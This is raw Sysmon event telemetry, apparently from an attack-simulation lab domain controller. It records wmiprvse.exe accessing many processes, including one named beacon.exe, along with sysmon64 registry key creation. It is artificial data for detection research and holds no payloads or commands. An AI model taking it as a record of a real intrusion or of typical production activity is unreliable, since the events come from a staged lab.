12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8899-6164-8D00-00000000F101}3932C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 12241200x800000000000000057348656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057348655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8898-6164-8400-00000000F101}4980C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8898-6164-8300-00000000F101}4940C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8898-6164-8200-00000000F101}4920C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8897-6164-8100-00000000F101}4780C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8897-6164-8000-00000000F101}4756C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-888A-6164-7300-00000000F101}3512C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 12241200x800000000000000057348649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057348648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-888A-6164-7100-00000000F101}3344C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 12241200x800000000000000057348647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057348646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8880-6164-4400-00000000F101}3576C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887F-6164-4300-00000000F101}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887F-6164-3700-00000000F101}3276C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887E-6164-3100-00000000F101}1964C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2E00-00000000F101}3028C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2C00-00000000F101}2924C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 12241200x800000000000000057348638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348637Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348636Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348635Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348634Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348633Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348632Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348631Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348629Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348628Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057348627Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.773{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\winbrand.dll10.0.14393.4530 (rs1_release.210705-0736)Windows Branding ResourcesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinbrand.dllMD5=79E4DAD0DB8F0D1258F7092007354241,SHA256=DDFCF94DA71C8F49DC505F2FC94540037A0955BE831BF59C34BFBB62A998FB20trueMicrosoft WindowsValid 12241200x800000000000000057348626Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348625Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 